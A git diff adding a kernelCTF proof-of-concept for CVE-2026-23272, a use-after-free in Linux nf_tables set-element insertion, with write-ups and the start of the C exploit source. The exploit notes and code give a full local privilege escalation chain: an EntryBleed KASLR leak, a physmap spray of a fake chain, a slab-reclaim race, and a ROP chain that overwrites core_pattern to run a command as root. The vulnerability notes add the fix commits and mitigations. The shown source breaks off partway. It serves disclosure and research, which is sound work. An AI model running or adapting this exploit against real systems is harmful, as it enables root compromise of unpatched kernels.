diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/exploit.md new file mode 100644 index 000000000..4a6deb0a8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/exploit.md @@ -0,0 +1,243 @@ +# Exploit: cos-113-18244.521.98 + +## Overview + +Local privilege escalation exploit for Linux 6.1.155 on COS-113 (PREEMPT_NONE, KVM, 2 CPUs, 3.5 GB RAM). It uses the nf_tables `nft_add_set_elem()` err_set_full UAF to turn a reclaimed verdict-map element into `NFT_GOTO`, jump into a fake chain sprayed into reclaimed `__init` pages, then overwrite `core_pattern` and print the flag over `ttyS0`. + +This exploit targets CVE-2026-23272. The same bug is reachable from both packet-path and control-plane RCU readers, but this version stays on the packet path through a verdict-map lookup in `NF_INET_LOCAL_OUT`. + +For the public PR, the `exploit` target builds the kernelXDK version in `exploit_xdk.cpp`. The exact 0-day submission archive of the original non-XDK exploit is included as `original.tar.gz`. + +**Stability**: Probabilistic. Depends on __init_begin page reclaim (29% per candidate) and in-batch SLUB LIFO reclaim timing. 13 candidates are tried within a 260-second budget. + +**KASLR bypass**: Primary path is external kbase input (`argv[1]`, via repro `kaslr_leak=1` flow). If unavailable/masked, the exploit falls back to integrated EntryBleed timing leak. Only kbase is needed (not phbase), since the fake chain lives at kbase-relative __init_begin page addresses. + +--- + +## Step-by-step Exploitation + +### Step 1: KASLR Bypass (External kbase or Entrybleed fallback) + + + +The exploit first tries an externally provided `kbase` (`argv[1]`, used by the repro `kaslr_leak=1` path). If unavailable/masked, it falls back to leaking `kbase` via the EntryBleed side channel (CVE-2022-4543), using `prefetchnta` + `prefetcht2` timing with `mfence`/`RDTSCP` fencing: + +- **Coarse scan**: 7-vote majority over `0xffffffff81000000 - 0xffffffffD0000000` with 16 MB steps (16 timing rounds each). Boyer-Moore majority vote selects the consensus. + +- **Fine scan**: 7-vote majority within +/- 16 MB of the coarse result with 2 MB steps (32 timing rounds each). Narrows to the exact 2 MB-aligned kbase. + +- Unlike `cos_113_18244_88`, this exploit does not need `phbase`. The fake chain is placed at kbase-relative `__init_begin` page addresses, so only `kbase` matters. + +**Objects**: None (pure side-channel, no kernel objects involved). + +### Step 2: Physmap Spray with Fake Chain + ROP Blob + + + +A 1 GB region (40% of available RAM) is allocated with `mmap(MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE)`. Every 4 KB page is filled with a fake `nft_chain` and fake `nft_rule_blob`. The blob comes from a kernelXDK `RopChain`: five `WRITE_WHAT_WHERE_64` actions to write the `core_pattern` pipe string in 8-byte chunks, then one `MSLEEP` action. + +#### __init_begin Page Reclaim Technique + +After boot, the kernel frees the `__init` section (`kbase + 0x345c000` to `kbase + 0x36de000`, 642 pages / 2568 KB) back to the buddy allocator. On COS-113, `CONFIG_DEBUG_PAGEALLOC` is off, so the old kernel virtual mapping still works. If `mmap(MAP_POPULATE)` gets one of those pages back, that physical page is reachable both from userspace and from its old kbase-relative kernel address (`kbase + OFF_INIT_BEGIN + page_offset`). + +With a 1 GB spray and 642 free `__init` pages out of roughly 900K total pages, about 186 sprayed pages (~29%) are expected to be usable `__init` pages. Since every sprayed page has the same layout, any hit is good enough. + +That removes the need for `phbase` scanning and keeps the address search one-dimensional. + +#### Page Layout (4096 bytes per page) + +``` ++0x000: Fake nft_chain (96 bytes) + +0x000: blob_gen_0 = page_kva + 0x80 (ptr to rule blob) + +0x008: blob_gen_1 = page_kva + 0x80 (ptr to rule blob) + +0x040: table = kbase (safe readable address) + +0x048: handle = 0 + +0x050: use = 1 + +0x054: flags = 0 + +0x058: name = page_kva + 0x300 (ptr to name string) ++0x080: Fake nft_rule_blob (472 bytes on this target) + +0x080: blob_size = 0x1d0 (464 bytes) + +0x088: rule_dp_0 = 0x380 (dlen=448, is_last=0) + +0x090: expr[0]..expr[13] (14 x 32B): ops=nft_immediate_ops, dreg=130 + 4*i + +0x258: rule_dp_1 = 1 (is_last=1, end marker) ++0x300: Name string "x\0" +``` + +**Objects**: Physical pages via physmap (direct map), reachable at kbase-relative KVAs through __init page reclaim. +**Cache**: N/A (physmap pages, not slab objects). + +### Step 3: Namespace Setup and nft Object Creation + + + +The exploit creates user and network namespaces (`unshare(CLONE_NEWUSER | CLONE_NEWNET)`) to gain `CAP_NET_ADMIN` for nf_tables access. The loopback interface is brought up. + +A single nfnetlink batch creates all required nft objects: + +1. **INET table** `t` -- container for all objects. +2. **Base chain** `bc` -- `NF_INET_LOCAL_OUT` hook at `NF_IP_PRI_FILTER` priority. All outgoing IPv4 packets traverse this chain. +3. **Verdict map** `vm` -- hash set with `size=1`, `key_len=4`, `data_type=verdict`, `data_len=16`. This is the vulnerable object: its size limit causes every additional insertion to hit the `err_set_full` path. +4. **Fill element** -- `key=0x00000000` with `verdict=NF_ACCEPT`. Fills the single slot, ensuring all subsequent insertions fail the capacity check. +5. **Rule** on `bc` -- Two expressions: `immediate(reg32_00 = KEY_RACE=0x00000001)` followed by `lookup(vm, sreg=reg32_00, dreg=verdict)`. Every packet loads KEY_RACE into a register and performs a map lookup. If the lookup hits a reclaimed fake element with matching key, its verdict (NFT_GOTO to fake chain) hijacks control flow. + +### Step 4: Race -- In-batch NEWSETELEM + NEWTABLE Spray + + + +Two threads run concurrently on 2 CPUs: + +#### Thread 1: Writer (CPU 0) + +Sends nfnetlink batches with interleaved NEWSETELEM + NEWTABLE pairs (128 pairs per batch). For each pair: + +1. **NEWSETELEM** (key=KEY_RACE, verdict=NF_ACCEPT): `nft_add_set_elem()` allocates a 52-byte element (kmalloc-cg-64), inserts it via `hlist_add_head_rcu()`, then the `atomic_add_unless()` capacity check fails. The `err_set_full` path calls `hlist_del_rcu()` + `kfree()` -- the element is freed **without** `synchronize_rcu()`. + +2. **NEWTABLE** (IPv4, name="s000".."s127", with 52-byte userdata): The kernel calls `kmemdup()` to allocate table userdata (52 bytes, GFP_KERNEL_ACCOUNT), which goes to **kmalloc-cg-64** -- the same slab as the just-freed element. Due to SLUB LIFO per-CPU freelist ordering, this allocation reclaims the exact slot freed by the preceding NEWSETELEM. + +The reclaimed slot now contains the spray userdata instead of a real set element. If a packet on CPU 1 does a lookup in the short window between `hlist_add_head_rcu()` and `hlist_del_rcu()` + `kfree()`, it can follow the stale data. + +The important part is that the NEWTABLE userdata allocation runs in the same nfnetlink batch as the freeing NEWSETELEM. That keeps the reclaim on CPU 0 and on the same per-CPU SLUB freelist. The batch is then aborted automatically (`NFNL_BATCH_FAILURE` from `-ENFILE`), which frees the temporary spray tables and their userdata. + +#### Thread 2: Packet Flood (CPU 1) + +Sends single-byte UDP packets to `127.0.0.1:31337` via `send()` in tight loops of 2000 packets. Each packet traverses `NF_INET_LOCAL_OUT`, hitting the base chain `bc` which evaluates the immediate + lookup rule. If the lookup finds a reclaimed fake element matching KEY_RACE, the NFT_GOTO verdict redirects `nft_do_chain()` to the physmap-sprayed fake chain. + +#### Spray Data Layout (52-byte NEWTABLE Userdata) + +The spray data overlays a freed `nft_hash_elem` (kmalloc-cg-64) with a valid element structure: + +| Offset | Field | Value | Purpose | +|--------|-------|-------|---------| +| +16 | `ext.genmask` | `0` | Active in current generation | +| +17 | `ext.offset[KEY]` | `16` | KEY at ext+16 = elem+32 | +| +19 | `ext.offset[DATA]` | `20` | DATA at ext+20 = elem+36 | +| +32 | KEY data (4B) | `htonl(KEY_RACE)` = `0x00000001` | Matches lookup key | +| +36 | `verdict.code` (4B) | `NFT_GOTO` = `(uint32_t)(-4)` | Redirect to chain | +| +44 | `verdict.chain` (8B) | physmap fake chain KVA | Points to ROP blob | + +**Vulnerable object**: `nft_hash_elem` (kmalloc-cg-64, 52-byte element for key_len=4 verdict map). +**Reclaim object**: NEWTABLE userdata (52 bytes, kmalloc-cg-64, same slab via GFP_KERNEL_ACCOUNT). + +#### Synchronization + +- **Writer thread sends batches continuously** on CPU 0. Each batch processes 128 NEWSETELEM+NEWTABLE pairs sequentially within the kernel's nfnetlink batch handler. +- **Packet thread floods continuously** on CPU 1. Packets hitting the lookup expression race against the writer's insert/remove/free/reclaim sequence. +- **Termination**: Parent process polls `/proc/sys/kernel/core_pattern` every 500ms. Each candidate cycle runs for 20 seconds (or 260 seconds if only 1 candidate from pagemap). + +### Step 5: ROP Chain Execution via nft_immediate_eval + + + +When the packet-path lookup hits the reclaimed fake element, its `NFT_GOTO` verdict redirects `nft_do_chain()` to the sprayed fake chain. `blob_gen_0` and `blob_gen_1` point to the fake `nft_rule_blob` at page+0x80, which contains serialized words from a kernelXDK `RopChain`. + +Each expression uses `nft_immediate_ops` (a legitimate kernel ops vtable) to write 16 bytes into `nft_do_chain()`'s register file at the `dreg` corresponding to the return address region on the stack. + +#### nft_do_chain Stack Frame (6.1.155) + +``` +sub $0x220, %rsp; 6 pushes = 48 bytes +regs at rsp+0x48 +return address at rsp+0x250 +dreg for ret addr = (0x250 - 0x48) / 4 = 130 +``` + +#### kernelXDK Post-RIP Chain + +The PR version does not hardcode the post-RIP write gadgets. It asks kernelXDK for this chain: + +1. `WRITE_WHAT_WHERE_64(chunk_0, core_pattern + 0x00)` +2. `WRITE_WHAT_WHERE_64(chunk_1, core_pattern + 0x08)` +3. `WRITE_WHAT_WHERE_64(chunk_2, core_pattern + 0x10)` +4. `WRITE_WHAT_WHERE_64(chunk_3, core_pattern + 0x18)` +5. `WRITE_WHAT_WHERE_64(chunk_4, core_pattern + 0x20)` +6. `MSLEEP(0x7FFFFFFF)` + +`chunk_0..chunk_4` are the little-endian 8-byte chunks of `|/bin/dd if=/dev/vdb of=/dev/ttyS0\0`. On this target, kernelXDK expands the five writes and one sleep into 28 qwords. The exploit packs those qwords into 14 `nft_immediate_eval` expressions, two qwords per expression. + +So the target-specific post-RIP gadget choice stays inside kernelXDK. The exploit only hardcodes the `nft_immediate_eval` stack-write primitive and the conversion from `RopChain` words into fake rule-blob expressions. + +**Constant explanations**: +- `DREG_RET = 130`: `(0x250 - 0x48) / 4`. `nft_do_chain()` has `sub $0x220, %rsp` + 6 pushes (48 bytes). `regs` is at `rsp+0x48`, return address at `rsp+0x250`. Register file is `uint32_t regs.data[]`, so offset `(0x250 - 0x48) / 4 = 130`. +- `BLOB_OFFSET = 0x80`: Offset within each physmap page where the fake `nft_rule_blob` starts. +- `NAME_OFFSET = 0x300`: Offset chosen so the variable-length XDK-generated blob cannot overlap the fake chain name pointer target. + +#### Kernel Symbol Offsets (cos-113-18244.521.98 vmlinux) + +| Define | Offset | Symbol | +|--------|--------|--------| +| `OFF_CORE_PATTERN` | `0x2bb9ec0` | `core_pattern` (global variable) | +| `OFF_NFT_IMM_OPS` | `0x1d43120` | `nft_immediate_ops` (expression ops vtable) | +| `OFF_INIT_BEGIN` | `0x345c000` | `__init_begin` (start of freed init pages) | +| `OFF_INIT_END` | `0x36de000` | `__init_end` (end of freed init pages) | + +The post-RIP write gadget, pop gadgets, and sleep gadget are not hardcoded in this PR version; they come from kernelXDK's target database and `RopAction` expansion. + +### Step 6: core_pattern Overwrite and Flag Exfiltration + + + +After the kernelXDK-generated chain finishes the five `WRITE_WHAT_WHERE_64` actions against `core_pattern`, `MSLEEP(0x7FFFFFFF)` keeps the system alive (BUGs with "scheduling while atomic" but `schedule()` still executes, keeping the system up long enough for the parent to detect the overwrite and trigger core dumps). + +The parent process (forked before entering the exploit child) polls `/proc/sys/kernel/core_pattern` every 500 ms. Once it detects the overwrite (string contains "/bin/dd"): + +1. Waits 500 ms for stability. +2. Forks a child that calls `raise(SIGSEGV)`. +3. The kernel's core dump handler invokes `call_usermodehelper` with the pipe command from `core_pattern`. +4. `/bin/dd if=/dev/vdb of=/dev/ttyS0` copies the flag from the virtio block device to the serial console. +5. The kctf infrastructure captures the flag from serial output. + +### Step 7: Candidate Cycling + + + +Since the __init_begin page reclaim is probabilistic (~29% of mmap'd pages are __init pages), the exploit generates 13 candidate KVAs spread across the __init range: + +- **Range**: `kbase + OFF_INIT_BEGIN` to `kbase + OFF_INIT_END` (642 pages) +- **Step**: `INIT_SIZE / 13` (page-aligned, ~49 pages between candidates) +- **Budget**: 260 seconds total, 20 seconds per candidate cycle + +For each candidate, the exploit: +1. Updates `g_page_kva = kbase + OFF_INIT_BEGIN + candidate_offset` +2. Refills all physmap pages with the ROP blob using the new KVA +3. Forks a child that runs `exploit_child()` for 20 seconds +4. Parent polls `core_pattern` for the overwrite signal + +If `/proc/self/pagemap` is readable (local QEMU testing), the exact physical frame number is used to compute the precise KVA, reducing to a single candidate. + +--- + +## Environmental Requirements + +- **CPU affinity**: The writer thread is pinned to CPU 0; the packet thread is pinned to CPU 1. This is critical because: + - SLUB uses per-CPU freelists. The NEWTABLE userdata allocation must run on the same CPU as the NEWSETELEM kfree to pick up the freed slot (LIFO order). Both happen within the same nfnetlink batch on CPU 0. + - The packet thread on a separate CPU ensures packets traverse the hook path concurrently with element allocation/free/reclaim. + +- **Namespaces**: User namespace + network namespace required for `CAP_NET_ADMIN`. The exploit calls `unshare(CLONE_NEWUSER)` then `unshare(CLONE_NEWNET)`. + +- **Memory**: The exploit uses 1 GB (40% of available RAM, capped at 2 GB) for physmap spray. The kctf VM has 3.5 GB RAM. + +## Differences from cos_113_18244_88 Exploit + +| Aspect | cos_113_18244_88 (addchain UAF) | cos_113_18244_98 (err_set_full UAF) | +|--------|-------------------------------|-------------------------------------| +| Vulnerability | `nf_tables_addchain()` INET partial hook rollback | `nft_add_set_elem()` err_set_full kfree without RCU | +| Vulnerable object | `nft_base_chain` (kmalloc-cg-256) | `nft_hash_elem` (kmalloc-cg-64) | +| Reclaim method | `msg_msg` spray (separate thread) | In-batch NEWTABLE userdata (same batch, SLUB LIFO) | +| Hijack mechanism | Overwrite `blob_gen_X` pointer in freed chain | Fake verdict element with NFT_GOTO to physmap chain | +| KASLR needs | kbase + phbase | kbase only (__init_begin approach) | +| IPv6 saturation | Yes (1024 chains to force -E2BIG) | No | +| Race setup | 3 threads (flood + race + spray) | 2 threads (writer + packet) | + +## Separation of Concerns + +| Code Section | Purpose | +|---|---| +| `detect_kbase()`, `detect_phbase()`, `do_entrybleed()` | KASLR bypass (information leak) | +| `setup_ns()` | Environment setup (namespace creation) | +| `nft_setup_all()` | nft object creation (table, chain, verdict map, fill element, rule) | +| `build_race_batch()`, `build_spray_udata()` | Race batch construction with interleaved NEWSETELEM + NEWTABLE spray | +| `writer_thread()` | Vulnerability trigger (NEWSETELEM causing err_set_full UAF) | +| `packet_thread()` | Exploitation support (providing racing packets for lookup) | +| `physmap_spray()`, `physmap_fill_rop()` | ROP payload construction (fake chain + rule blob + ROP chain) | +| `generate_candidates()` | Candidate KVA generation (__init_begin range) | +| `check_core_pattern()`, `trigger_core_dump()` | Post-exploitation (flag exfiltration) | diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/vulnerability.md new file mode 100644 index 000000000..f2c6ab42c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/vulnerability.md @@ -0,0 +1,104 @@ +# Vulnerability: Use-After-Free in nft_add_set_elem() err_set_full Path (CVE-2026-23272) + +## Summary + +A use-after-free exists in netfilter `nf_tables`, in the `err_set_full` path of `nft_add_set_elem()`. When a new element is inserted into a set that already reached its configured `size`, the element is first published to the hash chain with `hlist_add_head_rcu()` (through `nft_setelem_insert()` -> `nft_hash_insert()`), and only after that the code checks the capacity with `atomic_add_unless()`. If the set is already full, the rollback path calls `nft_setelem_remove()` (`hlist_del_rcu()`) and then `nf_tables_set_elem_destroy()` (`kfree()`) without waiting for an RCU grace period. + +That breaks the normal RCU publish / grace period / free ordering. Packet-path readers in `nft_hash_lookup()` and control-plane readers in `nft_hash_get()` both walk the hash chain under `rcu_read_lock()`, so they can still hold a pointer after `hlist_del_rcu()` unlinks the element and before the missing grace period. At that point the element has already been freed. + +## Affected Component + +- **Subsystem**: netfilter / nf_tables +- **Source file**: `net/netfilter/nf_tables_api.c` +- **Function**: `nft_add_set_elem()` +- **Error path**: `err_set_full` label (approx. line 6680) + +## Vulnerability Type + +- **Cause**: Use-After-Free (UAF) due to freeing an RCU-published set element on the "set full" rollback path +- **Root cause**: Race condition between packet path (`nft_hash_lookup()`) or control path (`nft_hash_get()`) and the `err_set_full` rollback in `nft_add_set_elem()` + +## Code Sequence + +The vulnerable sequence in `nft_add_set_elem()` (nf_tables_api.c, around line 6642-6686): + +```c +ext->genmask = nft_genmask_cur(ctx->net); + +err = nft_setelem_insert(ctx->net, set, &elem, &ext2, flags); +// element is now in the hash chain -- visible to RCU readers + +if (!(flags & NFT_SET_ELEM_CATCHALL) && set->size && + !atomic_add_unless(&set->nelems, 1, set->size + set->ndeact)) { + err = -ENFILE; + goto err_set_full; +} +... + +err_set_full: + nft_setelem_remove(ctx->net, set, &elem); + // hlist_del_rcu -- unlinks but doesn't wait +err_element_clash: + kfree(trans); +err_elem_free: + nf_tables_set_elem_destroy(ctx, set, elem.priv); + // kfree(elem) -- no synchronize_rcu() first! +``` + +The regular abort path (`__nf_tables_abort()`) and the async destroy worker (`nft_trans_gc_work_done()`) both wait for RCU readers before freeing removed elements. `err_set_full` does not. + +## Requirements to Trigger + +- **User namespaces**: Not required for the bug itself. This exploit uses them so an unprivileged user can create a network namespace and gain `CAP_NET_ADMIN` inside it. +- **Capabilities**: `CAP_NET_ADMIN` (inside the user+network namespace for this exploit) +- **Kernel configuration**: `CONFIG_NF_TABLES`, `CONFIG_NF_TABLES_INET` +- **Other**: A hash set with `size=1` so the capacity check fails on every new insertion. + +## Commit Which Introduced the Vulnerability + +- **Commit**: [`35d0ac9070ef`](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=35d0ac9070ef) ("netfilter: nf_tables: fix set->nelems counting with no NLM_F_EXCL") +- **Version**: v4.10 (January 2017) +- This moved the capacity check to after insertion, which created the case where an RCU-visible element can be freed on the rollback path without a grace period. + +## Commit Which Fixed the Vulnerability + +- **Fix approach**: Upstream did not take the simple `synchronize_rcu()` fix from the initial report. Instead it unconditionally bumps `set->nelems` before insertion and lets rollback go through the existing transaction-abort path, which already does the right RCU teardown. +- **Patch commit**: [`def602e498a4`](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=def602e498a4f951da95c95b1b8ce8ae68aa733a) ("netfilter: nf_tables: unconditionally bump set->nelems before insertion") + +## Affected Kernel Versions + +- **Introduced in**: 4.10 +- **Affected stable ranges**: 4.10 - 6.1.164, 6.2 - 6.6.127, 6.7 - 6.18.16, and 6.19 - 6.19.6 +- **Affected mainline range**: 7.0-rc1 - 7.0-rc2 +- **Fixed in**: 6.1.165, 6.6.128, 6.18.17, 6.19.7, and mainline 7.0-rc3 + +## Blocking the Vulnerability + +Ways to block this path: + +- **Disabling user namespaces** (`kernel.unprivileged_userns_clone=0` or equivalent) stops this exploit path from obtaining `CAP_NET_ADMIN` in a private network namespace. +- **Blocking `NETLINK_NETFILTER` socket creation** from unprivileged contexts. +- **Disabling nf_tables support** (`CONFIG_NF_TABLES=n`) or INET tables (`CONFIG_NF_TABLES_INET=n`). +- **Restricting `nf_tables` access** with LSM policy (for example SELinux or AppArmor rules denying netfilter configuration). + +## KASAN Report + +``` +BUG: KASAN: use-after-free in nft_hash_get+0xf0/0x120 +Read of size 8 at addr ffff888103f6db00 by task init/158 + +Call Trace: + nft_hash_get+0xf0/0x120 + nft_get_set_elem+0x248/0x500 + nf_tables_getsetelem+0x326/0x4f0 + nfnetlink_rcv_msg+0x37a/0x4c0 + +Allocated by task 156: + nft_set_elem_init+0x71/0x270 + nft_add_set_elem+0xfda/0x1aa0 + +Freed by task 156: + nft_add_set_elem+0x1378/0x1aa0 +``` + +Both alloc and free happen in `nft_add_set_elem` on the same task, which matches the `err_set_full` rollback path. diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/Makefile b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/Makefile new file mode 100644 index 000000000..af176334c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/Makefile @@ -0,0 +1,51 @@ +# kernelCTF exploit build for cos-113-18244.521.98 +# +# Default target builds the kernelXDK-integrated version (exploit_xdk.cpp). +# Use 'make exploit_original' for the original C version (exploit.c). + +KERNELXDK_INCLUDE_DIR ?= +KERNELXDK_LIB_DIR ?= + +CXX ?= g++ +CC ?= gcc +CXXFLAGS := -std=c++20 -I. -static -O2 -Wall -pthread +CFLAGS := -static -O2 -Wall -pthread + +ifneq ($(strip $(KERNELXDK_INCLUDE_DIR)),) +CXXFLAGS += -I$(KERNELXDK_INCLUDE_DIR) +endif + +LDFLAGS := -lkernelXDK -pthread +ifneq ($(strip $(KERNELXDK_LIB_DIR)),) +LDFLAGS := -L$(KERNELXDK_LIB_DIR) $(LDFLAGS) +endif + +.PHONY: all run clean prerequisites + +all: exploit + +# Optional hook used by CI. No extra prerequisites are needed here. +prerequisites: + @true + +# Download kernelXDK target database if not present +target_db.kxdb: + wget -q -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +# kernelXDK-integrated version (C++) +exploit: exploit_xdk.cpp target_db.kxdb + $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) + +# Debug build target used by CI verification. +exploit_debug: exploit_xdk.cpp target_db.kxdb + $(CXX) $(CXXFLAGS) -g -o $@ $< $(LDFLAGS) + +# Original C version (does not require kernelXDK) +exploit_original: exploit.c + $(CC) $(CFLAGS) -o $@ $< + +run: exploit + ./exploit + +clean: + rm -f exploit exploit_debug exploit_original target_db.kxdb diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit new file mode 100755 index 000000000..70dfaa3f0 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit.c b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit.c new file mode 100644 index 000000000..b670a45c1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit.c @@ -0,0 +1,1320 @@ +/* + * COS-113 (6.1.155) LPE exploit via nf_tables err_set_full UAF + * + * Vulnerability: In nft_add_set_elem(), when a set with size=1 is full, + * the element is inserted via hlist_add_head_rcu(), atomic_add_unless() fails, + * element is removed via hlist_del_rcu() and freed via kfree() (NOT kfree_rcu). + * Concurrent RCU readers can access the freed element. + * + * Strategy: + * 1. Create verdict map (hash, size=1, key_len=4) with fill element + * 2. Base chain with immediate(KEY_RACE) + lookup rule + * 3. Race: writer inserts elements (freed via err_set_full), spray reclaims + * with fake element containing NFT_GOTO(physmap_chain), packet flood + * triggers lookup -> follows fake verdict -> ROP via fake chain + * 4. ROP overwrites core_pattern -> trigger SIGSEGV -> core dump -> flag via serial + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ========== COS-113 kernel offsets (6.1.155) ========== */ +#define OFF_MODPROBE 0x02a76a20ULL +#define OFF_NFT_IMM_OPS 0x01d43120ULL +#define OFF_POP_RDI 0x00195d8cULL /* real pop rdi; jmp __x86_return_thunk in __poly1305_block */ +#define OFF_POP_RSI_RDI 0x00afc391ULL /* real pop rsi; pop rdi; jmp __x86_return_thunk in queue_request_irq */ +#define OFF_STRCPY 0x012b5ac0ULL +#define OFF_DO_EXIT 0x001aaf90ULL +#define OFF_CORE_PATTERN 0x02bb9ec0ULL +#define OFF_MSLEEP 0x00243850ULL + +/* struct nft_chain offsets for COS-113 */ +#define CHAIN_OFF_BLOB0 0 +#define CHAIN_OFF_BLOB1 8 +#define CHAIN_OFF_TABLE 64 +#define CHAIN_OFF_HANDLE 72 +#define CHAIN_OFF_USE 80 +#define CHAIN_OFF_FLAGS 84 +#define CHAIN_OFF_NAME 88 + +/* page layout for physmap ROP blob */ +#define BLOB_OFFSET 0x80 +#define NAME_OFFSET 0x1C0 +#define PATH_OFFSET 0x200 + +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif +#ifndef NF_IP_PRI_FILTER +#define NF_IP_PRI_FILTER 0 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFTA_TABLE_USERDATA +#define NFTA_TABLE_USERDATA 6 +#endif + +/* spray: in-batch NEWTABLE userdata for kmalloc-cg-64 reclamation. + * Each NEWSETELEM that triggers err_set_full frees the element via kfree(). + * The immediately following NEWTABLE allocates userdata (52 bytes, same slab) + * via SLUB LIFO on the same CPU, reclaiming the freed slot with our data. + * The batch is auto-aborted (NFNL_BATCH_FAILURE from -ENOSPC), freeing + * all spray tables + userdata afterwards. Same names reusable next batch. + */ +#define SPRAY_UDATA_LEN 52 +#define SPRAY_BATCH_PAIRS 128 + +#define PHYSMAP_MB 1024 + +#define KEY_FILL 0x00000000u +#define KEY_RACE 0x00000001u +#define NFT_GOTO_CODE ((uint32_t)(-4)) + +#define RACE_SECONDS 260 +#define CYCLE_SECONDS 20 +#define MAX_CANDS 13 +#define MAX_EB_CANDS 5 + +/* __init_begin page reclaim: pages freed at boot remain mapped at kbase + offset. + * CONFIG_DEBUG_PAGEALLOC is not set on COS, so kernel text mapping persists. + * mmap+MAP_POPULATE reclaims these pages; data is visible at kbase-relative KVA. */ +#define OFF_INIT_BEGIN 0x345c000ULL +#define OFF_INIT_END 0x36de000ULL +#define INIT_SIZE (OFF_INIT_END - OFF_INIT_BEGIN) /* 0x282000 = 2568K = 642 pages */ + +/* ========== globals ========== */ +static volatile sig_atomic_t g_stop; +static uint64_t kbase, phbase; +static void *phys_region; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva; + +/* Candidate search: (kbase, init_page_offset) pairs */ +struct cand3d { uint64_t kb, pb, kva_off; }; +static struct cand3d cands3d[MAX_CANDS]; +static int num_cands3d; + +/* EntryBleed multi-candidate output */ +static uint64_t eb_kbases[MAX_EB_CANDS]; +static int eb_nkb; +static uint64_t eb_phbases[MAX_EB_CANDS]; +static int eb_npb; + +/* ========== helpers ========== */ +static void die(const char *m) { perror(m); _exit(1); } +static void sleep_ms(int ms) { + struct timespec ts = {ms/1000, (ms%1000)*1000000L}; + nanosleep(&ts, NULL); +} +static const char *pick_flag_device(void) { + if (access("/dev/vdb", R_OK) == 0) return "/dev/vdb"; + if (access("/dev/vda", R_OK) == 0) return "/dev/vda"; + return "/dev/vdb"; +} +static uint64_t env_u64(const char *name) { + const char *v = getenv(name); + return v ? strtoull(v, NULL, 0) : 0; +} + +/* ========== netlink buffer helpers ========== */ +struct nlbuf { uint8_t *buf; size_t len, cap; }; + +static void nlbuf_init(struct nlbuf *b, void *buf, size_t cap) { + b->buf = buf; b->len = 0; b->cap = cap; +} + +static struct nlmsghdr *nlbuf_begin_msg(struct nlbuf *b, uint16_t type, + uint16_t flags, uint32_t seq, uint32_t pid, uint8_t fam, uint16_t res) +{ + size_t off = NLMSG_ALIGN(b->len); + size_t need = off + NLMSG_SPACE(sizeof(struct nfgenmsg)); + if (need > b->cap) return NULL; + struct nlmsghdr *h = (void *)(b->buf + off); + memset(h, 0, NLMSG_SPACE(sizeof(struct nfgenmsg))); + h->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + h->nlmsg_type = type; h->nlmsg_flags = flags; + h->nlmsg_seq = seq; h->nlmsg_pid = pid; + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = fam; g->version = NFNETLINK_V0; g->res_id = htons(res); + b->len = off + NLMSG_ALIGN(h->nlmsg_len); + return h; +} + +static int nlbuf_put(struct nlbuf *b, struct nlmsghdr *h, uint16_t t, + const void *d, uint16_t dl) +{ + size_t mo = (uint8_t *)h - b->buf; + size_t me = mo + NLMSG_ALIGN(h->nlmsg_len); + if (me != b->len) return -1; + size_t nl = NLA_HDRLEN + dl, np = NLA_ALIGN(nl); + if (me + np > b->cap) return -1; + struct nlattr *a = (void *)(b->buf + me); + a->nla_type = t; a->nla_len = nl; + if (dl) memcpy((uint8_t *)a + NLA_HDRLEN, d, dl); + if (np > nl) memset((uint8_t *)a + nl, 0, np - nl); + h->nlmsg_len = NLMSG_ALIGN(h->nlmsg_len) + np; + b->len = mo + NLMSG_ALIGN(h->nlmsg_len); + return 0; +} + +static struct nlattr *nlbuf_nest_start(struct nlbuf *b, struct nlmsghdr *h, uint16_t t) { + size_t mo = (uint8_t *)h - b->buf; + size_t me = mo + NLMSG_ALIGN(h->nlmsg_len); + if (me != b->len) return NULL; + size_t np = NLA_ALIGN(NLA_HDRLEN); + if (me + np > b->cap) return NULL; + struct nlattr *a = (void *)(b->buf + me); + a->nla_type = t | NLA_F_NESTED; a->nla_len = NLA_HDRLEN; + if (np > NLA_HDRLEN) memset((uint8_t *)a + NLA_HDRLEN, 0, np - NLA_HDRLEN); + h->nlmsg_len = NLMSG_ALIGN(h->nlmsg_len) + np; + b->len = mo + NLMSG_ALIGN(h->nlmsg_len); + return a; +} + +static void nlbuf_nest_end(struct nlbuf *b, struct nlattr *n) { + (void)b; + n->nla_len = (uint16_t)(b->buf + b->len - (uint8_t *)n); +} + +static int nl_u32be(struct nlbuf *b, struct nlmsghdr *h, 